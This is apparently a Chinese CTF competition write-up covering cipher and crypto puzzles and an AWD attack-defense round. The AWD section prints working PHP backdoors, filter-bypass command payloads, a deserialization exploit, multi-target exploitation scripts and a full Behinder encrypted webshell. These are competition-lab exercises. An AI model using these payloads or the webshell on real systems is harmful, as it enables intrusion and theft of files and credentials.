文章目录
CTF
Misc
Boring_exe
!_
..... ..... ..... ..... !?!!. ?.... ..... ..... ..... .?.?! .?... .!...
..... ..... !.?.. ..... !?!!. ?!!!! !!?.? !.?!! !!!.. ..... ..... .!.?.
..... ...!? !!.?. ..... ..?.? !.?.. ..... .!.?. ..... ..... ..!?! !.?!!
!!!!! !!!!! ?.?!. ?!!!! !!!!! !!!!! !!!.? ..... ..... .!?!! .?... .....
..?.? !.?.. ..... ..... ..!.! !!!!! !!!.! !!!!. ?.... ...!? !!.?. .....
?.?!. ?..!. !!!!! !!!!. !!!!! !!!!. ?.... ..... !?!!. ?.... ....? .?!.?
....! .?.
Ook!密码
Ook!在线解密站:https://tool.bugku.com/brainfuck/
flag{
Ookisok}
ezAffine
Daylight
感谢江西师范大学:WAXZ战队师傅提供本题的wp
n=24030381175065789627867818021031309186965318861955402618375094156989560631225056400068280970357343617465261811691559275086986164901405512215968447835573713149231336594364799146504286982124850979481910739400555900516891562640944424296188089156508429086638459243074623801424444379741940400624550247210709108293164193827193821978694274672716764474152393429524314859853376325015012885883855819552203740904895242301492787682366135817255276597250505586595070110209229270379691148517421288247672403709484984083988966720494416926899250840012575481136166618973367329708626081023089829778864549053830890201012932527796486827519
c1=7706442311376298907118381553814187694306437942337200300920018382827744477296762105669322390236380377042026460058526286493515418722731849971411879053724334926597860433790660568227623266459105700578574867980278136078799958698624620338469216407947276632981229373095281141319203245321172350378427449842394930055529441744690732690189155630980736716300509547085032174345753133838250340838995285142338255951756404101946977370148727459867175980397841996210997274012491629791252693401571504945522427861126234928419824136852180508014703063857673244567242488630499415730763245048617632714296374909199028722650732705222178007385
c2=22423938730620301024336096061283705945892027623793660306239291359418958473934583979350384252488494023600239884048653436314101275290157972045454993641659471672605679497398173588217340705125922148550132426481727445141158741816240665812195493040369287582638492321538655028939958996384211181094086886177394010485535445009088322043647955338445795429449360349339936606800994026319620067195422963814641797851423046506617965736694331256799051468484280532276344029152140431817760731420316457245257243157665090587855008596785240088881665435451552191237548113820151383474872494353994135644477990413743416249730006854238049329690
e1=35
e2=42
#python2
import gmpy2
import binascii
import rsa
import math
from Crypto.Util import number
def exgcd(m, n, x, y):
if n == 0:
x = 1
y = 0
return (m, x, y)
a1 = b = 1
a = b1 = 0
c = m
d = n
q = int(c / d)
r = c % d
while r:
c = d
d = r
t = a1
a1 = a
a = t - q * a
t = b1
b1 = b
b = t - q * b
q = int(c / d)
r = c % d
x = a
y = b
return d, x, y
c1=7706442311376298907118381553814187694306437942337200300920018382827744477296762105669322390236380377042026460058526286493515418722731849971411879053724334926597860433790660568227623266459105700578574867980278136078799958698624620338469216407947276632981229373095281141319203245321172350378427449842394930055529441744690732690189155630980736716300509547085032174345753133838250340838995285142338255951756404101946977370148727459867175980397841996210997274012491629791252693401571504945522427861126234928419824136852180508014703063857673244567242488630499415730763245048617632714296374909199028722650732705222178007385
c2=22423938730620301024336096061283705945892027623793660306239291359418958473934583979350384252488494023600239884048653436314101275290157972045454993641659471672605679497398173588217340705125922148550132426481727445141158741816240665812195493040369287582638492321538655028939958996384211181094086886177394010485535445009088322043647955338445795429449360349339936606800994026319620067195422963814641797851423046506617965736694331256799051468484280532276344029152140431817760731420316457245257243157665090587855008596785240088881665435451552191237548113820151383474872494353994135644477990413743416249730006854238049329690
e1=35
e2=42
e1=e1//7
e2=e2//7
n=24030381175065789627867818021031309186965318861955402618375094156989560631225056400068280970357343617465261811691559275086986164901405512215968447835573713149231336594364799146504286982124850979481910739400555900516891562640944424296188089156508429086638459243074623801424444379741940400624550247210709108293164193827193821978694274672716764474152393429524314859853376325015012885883855819552203740904895242301492787682366135817255276597250505586595070110209229270379691148517421288247672403709484984083988966720494416926899250840012575481136166618973367329708626081023089829778864549053830890201012932527796486827519
ans=exgcd(e1,e2,0,0)
s1=ans[1]
s2=ans[2]
m=(gmpy2.powmod(c1,s1,n)*gmpy2.powmod(c2,s2,n))%n
print gmpy2.iroot(m,7)[1]
while gmpy2.iroot(m,7)[1]==False:
m=m+n
print m
print number.long_to_bytes(gmpy2.iroot(m,7)[0])
flag{
1_0nly_see_d4ylight_d4ylight}
Blue
binwalk
分析
foremost
分离
zip伪加密
得到blindsql.pcapng
根据文件名称都知道这是sql盲注
的流量包,所以直接过滤出http
的包就行了
这是直接GET
传参的,可以过滤的更仔细一点
http.request.method==GET
sql盲注分析
,可以看到flag字段的第一位内容的ascii码为:102
>>> chr(102)
'f'
以此类推
flag{
Gre4t_j0B_ON_This_Blue_sh4rk}
Web
Aurora website
上传图片,修改Content-type
,根据提示,得知这里应该是条件竞争
使用burp intruder
不断发包即可
web2(忘了叫啥名)
感谢江西理工大学:Stalker战队师傅的思路
Crypto
EasyRSA
flag{
We1c0meCtf3r_elab}
Interceptedtelegram
摩斯密码
.- -.-. - .. ----- -. --.- ..- .. -.-. -.-
摩斯密码在线:http://www.zhongguosou.com/zonghe/moersicodeconverter.aspx
flag{
ACTI0NQUICK}
AWD
AWD1
awd1
├── about.php
├── admin
│ ├── footer.php
│ ├── header.php
│ ├── index.php
│ ├── logout.php
│ ├── upload
│ │ ├── 1596596144.png
│ │ ├── 1600179756.php
│ │ ├── 1600180813.exe
│ │ └── .library.php
│ └── upload.php
├── config.php
├── contact.php
├── css
│ ├── bootstrap.css
│ ├── chocolat.css
│ ├── flexslider.css
│ └── style.css
├── data
│ ├── flot-data.js
│ └── morris-data.js
├── footer.php
├── gulpfile.js
├── header.php
├── images
│ ├── 10.jpg
│ ├── 11.jpg
│ ├── 12.jpg
│ ├── 13.jpg
│ ├── 14.jpg
│ ├── 15.jpg
│ ├── 16.jpg
│ ├── 17.jpg
│ ├── 1.jpg
│ ├── 1.png
│ ├── 2.jpg
│ ├── 2.png
│ ├── 3.jpg
│ ├── 3.png
│ ├── 4.jpg
│ ├── 4.png
│ ├── 5.jpg
│ ├── 5.png
│ ├── 6.jpg
│ ├── 7.jpg
│ ├── 8.jpg
│ ├── 9.jpg
│ ├── banner1.jpg
│ ├── banner.jpg
│ ├── close.png
│ ├── co.png
│ ├── img-sp.png
│ ├── left.png
│ └── right.png
├── index.php
├── js
│ ├── bootstrap.js
│ ├── jquery-1.11.1.min.js
│ ├── jquery.chocolat.js
│ ├── jquery.flexslider.js
│ └── sb-admin-2.js
├── less
│ ├── mixins.less
│ ├── sb-admin-2.less
│ └── variables.less
├── login.php
├── search.php
├── ser.php
├── services.php
├── .shell.php
├── single.php
└── Wopop_files
├── askgreen.png
├── errorred.png
├── google_jquery.min.js
├── google_jquery-ui.min.js
├── JQuery.cookie.js
├── jquery.pagination.js
├── jquery.ui.all.css
├── loading1.gif
├── loadingpn.gif
├── login_bgx.gif
├── login.js
├── login_m_bg.png
├── logo.png
├── okgreen.png
├── pagination.css
├── site_bg.png
├── style.css
├── style_log.css
├── userpanel.css
└── webtemples.js
8 directories, 85 files
利用点1
后门文件:awd1/.shell.php
<?php
$key = $_POST["cmd"];
if(isset($key)){
$key = str_replace("flag","",$key);
}
eval($key);
?>
只是把flag
字符给直接替换为空,利用方法很多
cmd=system("cat /flflagag.txt");
cmd=system("cat /fl''ag.txt");
cmd=system("cat /fla'g'.txt");
cmd=system("cat /fl${9}ag.txt");
cmd=system("cat /fl${IFS}ag.txt");
cmd=system("cat /fl\ag.txt");
cmd=system("cat /`echo 'ZmxhZy50eHQ=' | base64 -d`");
........
import requests
def post_shell(ip_list):
flag_path = '/.shell.php'#shell路径
post_data = 'cmd=system("cat /flflagag.txt");'
for i in ip_list:
header_info = {
'Host':i,
'User-Agebt':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language':'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Accept-Encoding':'gzip, deflate',
'Content-Type':'application/x-www-form-urlencoded'
}
flag_url = 'http://'+i+flag_path
res = requests.post(url=flag_url,data=post_data,headers=header_info)
print("[+]{0}: {1}\n".format(i,res.text))
if __name__ == '__main__':
ip_list = \
['172.20.102.101',
'172.20.103.101',
'172.20.104.101',
'172.20.105.101',
'172.20.106.101',
'172.20.107.101',
'172.20.108.101',
'172.20.109.101',
'172.20.110.101',
'172.20.111.101',
'172.20.112.101']
post_shell(ip_list)
利用点2
任意文件读取:awd1/about.php
<?php
$file=$_GET['file'];
$file = str_replace("flag","",$file);
$file = str_replace("../","",$file);
$file = str_replace("..","",$file);
$file = str_replace("file://","",$file);
@print_r(file_get_contents($file));
?>
利用file://
伪协议读绝对路径即可,AWD环境中flag的绝对路径都已知:/flag.txt
?file=fifile://le:///flflagag.txt
?file=php://filter/read=convert.base64-encode/resource=/flflagag.txt
......
利用点3
代码执行:awd1/config.php
//根目录
$basedir = '';
$shell=@$_POST['shell'];
if(preg_match('/(system|exec|shell|file_|call|open|preg|eval|assert|pass|include|require|key)/i', $shell)) {
exit();
}
@eval($shell);
参数绕过代码执行
shell=(s.y.s.t.e.m)('cat /flag.txt');
shell="\x73\x79\x73\x74\x65\x6d"('cat /flag.txt');
利用点4
任意文件读取:awd1/concat.php
<?php
include 'header.php';
$file_path = @$_GET['path'];
if(file_exists($file_path)){
$fp = fopen($file_path,"r");
$str = fread($fp,filesize($file_path));
echo $str = str_replace("\r\n","<br />",$str);
}
?>
?path=/flag.txt
?path=/etc/passwd
利用点5
参数绕过命令执行:awd1/footer.php
<?php
$shell=@$_POST['shell'];
if(preg_match('/(cat|\ |more|flag)/i',$shell)&&str_replace(" ","",$shell)) {
exit();
}else{
@system($shell);
}
?>
shell=ca''t</fl''ag.txt
shell=`echo${
IFS}Y2F0IC9mbGFnLnR4dAo=|base64${
IFS}-d`
shell=a=ca;b=t;c=fl;d=ag;$a$b${IFS}/$c$d.txt
利用点6
注入:awd1/login.php
<?php
include_once('config.php');
if (!empty($_POST['username'])) {
$user=$_POST['username'];
$pass=$_POST['password'];
$query = "SELECT * FROM admin WHERE user_name='{
$user}' and user_pass='{
$pass}' ";
$data = mysqli_query($dbc,$query);
if (mysqli_num_rows($data) == 1) {
$row = mysqli_fetch_array($data);
$_SESSION['username'] = $row['user_name'];
header('Location: ./admin/index.php');
}else{
echo '<hr/><center><br/>用户名:',$user,'<br/>密码:',$pass,'<br/><br/>用户名密码错误</center>';
}
}
?>
利用点7
注入:awd1/search.php
<?php
include 'header.php';
include_once('config.php');
$id=$_GET['id'];
$check = eregi('select|insert|update|delete|\'|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile', $id);
if($check){
echo "Invalid strings!!!Please try agine!";
}else{
$query = "SELECT * FROM news WHERE id=$id";
$data = mysqli_query($dbc,$query);
$com = mysqli_fetch_array($data);
}
?>
eregi()
函数可以使用%00
截断,然后进行注入
ereg()
和eregi()
函数在PHP 7
中被弃用了,我这里的容器环境是PHP 7.3
,测试时会返回致命错误
懒得测试了…
利用点8
反序列化代码执行:awd1/ser.php
<?php
class Smi1e
{
protected $ClassObj;
function __construct() {
$this->ClassObj = new safe();
}
function __destruct() {
$this->ClassObj->action();
}
}
class safe
{
function action() {
echo "Here is safe";
}
}
class unsafe
{
private $data;
function action() {
eval($this->data);
}
}
unserialize(@$_GET['test']);
直接构造poc
<?php
class Smi1e
{
protected $ClassObj;
function __construct() {
$this->ClassObj = new unsafe();
}
function __destruct() {
$this->ClassObj->action();
}
}
class unsafe
{
private $data="system('cat /flag.txt');";
function action() {
eval($this->data);
}
}
$res = new Smi1e();
echo urlencode(serialize($res));
?>
?test=O%3A5%3A%22Smi1e%22%3A1%3A%7Bs%3A11%3A%22%00%2A%00ClassObj%22%3BO%3A6%3A%22unsafe%22%3A1%3A%7Bs%3A12%3A%22%00unsafe%00data%22%3Bs%3A24%3A%22system%28%27cat+%2Fflag.txt%27%29%3B%22%3B%7D%7D
PS:吐槽一下出题人写的这个Smi1e
类名,这Smi1e
直接让我看成Smile
。。。。。。。
利用点9
命令执行:awd1/admin/footer.php
<?php
$shell=@$_POST['shell'];
@system($shell);
if($shell !=""){
exit();
}
?>
shell=cat /flag.txt
利用点10
直接送flag:awd1/admin/index.php
<!-- banner -->
<div class="banner1">
</div>
<!-- //banner -->
<!-- single -->
<div class="single">
<div class="container">
<div class="single-page-artical">
<div class="artical-content">
<h3>flag:<?php print_r(file_get_contents('/flag'));?></h3>
<img class="img-responsive" src="../images/banner.jpg" alt=" " />
<p></p>
</div>
不过我记得比赛的时候,flag的路径及文件名是:/flag.txt
,所以这里比赛的时候是读不出来的
修改为/flag.txt
即可读到flag
利用点11
任意文件上传:awd1/admin/upload.php
<html lang="zh-CN">
<head>
<meta charset="utf-8">
<?php
include_once('../config.php');
if (isset($_SESSION['username'])) {
include_once('header.php');
$html_username = htmlspecialchars($_SESSION['username']);
if(isset($_SESSION['error_info']) && $_SESSION['error_info'] != '') {
echo $_SESSION['error_info'];
$_SESSION['error_info'] = '';
}
}
else {
header('Location: ../login.php');
}
$error=$_FILES['pic']['error'];
$tmpName=$_FILES['pic']['tmp_name'];
$name=$_FILES['pic']['name'];
$size=$_FILES['pic']['size'];
$type=$_FILES['pic']['type'];
try{
if($name!=="")
{
$name1=substr($name,-4);
if(is_uploaded_file($tmpName)){
$time=time();
$rootpath='./upload/'.$time.$name1;
$file=fopen($tmpName, "r") or die('No such file!');
$content=fread($file, filesize($tmpName));
if(strstr($content,'fuck')){
exit("<script language='JavaScript'>alert('You should not do this!');window.location='index.php?page=submit'</script>");
}
if(!move_uploaded_file($tmpName,$rootpath)){
echo "<script language='JavaScript'>alert('文件移动失败!');window.location='index.php?page=submit'</script>";
exit;
}
}
echo "上传成功:/upload/".$time.$name1;
}
}
catch(Exception $e)
{
echo "ERROR";
}
//
require('footer.php');
?>
</html>
在awd1/admin/upload/1600179756.php
题目本身存放了一个命令执行后门
//1600179756.php
<?php system($_GET['cmd']);?>
利用点12
冰蝎马:awd1/admin/upload/.library.php
<?php
@error_reporting(0);
session_start();
if (isset($_GET['djicoieDJNCIVD']))
{
$key=substr(md5(uniqid(rand())),16);
$_SESSION['k']=$key;
print $key;
}
else
{
$key=$_SESSION['k'];
$post=file_get_contents("php://input");
if(!extension_loaded('openssl'))
{
$t="base64_"."decode";
$post=$t($post."");
for($i=0;$i<strlen($post);$i++) {
$post[$i] = $post[$i]^$key[$i+1&15];
}
}
else
{
$post=openssl_decrypt($post, "AES128", $key);
}
$arr=explode('|',$post);
$func=$arr[0];
$params=$arr[1];
class C{
public function __construct($p) {
eval($p."");}}
@new C($params);
}
?>
冰蝎马:https://www.t00ls.net/articles-56337.html
PS C:\Users\Administrator\Desktop> php -r "echo openssl_encrypt('|system(\'whoami\');','AES128','');"
sbD9xXGKpb2/BSn/O/gPNg0MrbwusxVXLEVTNRXyGcc=
AWD2
利用点1
文件读取直接送flag:ecshop/a.php
<?php
if(isset($_GET['shop'])){
echo file_get_contents(base64_decode('L2ZsYWcudHh0'));}
?>
PS C:\Users\Administrator> php -r "var_dump(base64_decode('L2ZsYWcudHh0'));"
string(9) "/flag.txt"
import requests
def get_shell(ip_list):
flag_path = '/a.php'
pwd = 'shop'
command = 'test'
for i in ip_list:
flag_url = 'http://'+i+flag_path+'/?'+pwd +'='+command
res = requests.get(url=flag_url)
print("[+]{0}: {1}\n".format(i,res.text))
if __name__ == '__main__':
ip_list = \
['172.20.102.102',
'172.20.103.102',
'172.20.104.102',
'172.20.105.102',
'172.20.106.102',
'172.20.107.102',
'172.20.108.102',
'172.20.109.102',
'172.20.110.102',
'172.20.111.102',
'172.20.112.102']
get_shell(ip_list)
利用点2
命令执行:ecshop/api.php
$hook = $_GET['s'];
if(isset($hook)){
echo `$hook`;
}
?s=cat /flag.txt
利用点3
文件读取直接送flag:ecshop/check_file.php
if(isset($_GET['shop'])){
echo file_get_contents(base64_decode('L2ZsYWcudHh0'));}
利用点4
文件读取送flag:ecshop/config.php
f(isset($_GET['shop'])){
echo file_get_contents(base64_decode('ZmxhZy50eHQ='));}
?><?php
if(isset($_GET['shop'])){
echo file_get_contents(base64_decode('ZmxhZy50eHQ='));}
?>
不过这里flag.txt
路径写错了,所以读不出来
PS C:\Users\Administrator> php -r "var_dump(base64_decode('ZmxhZy50eHQ='));"
string(8) "flag.txt"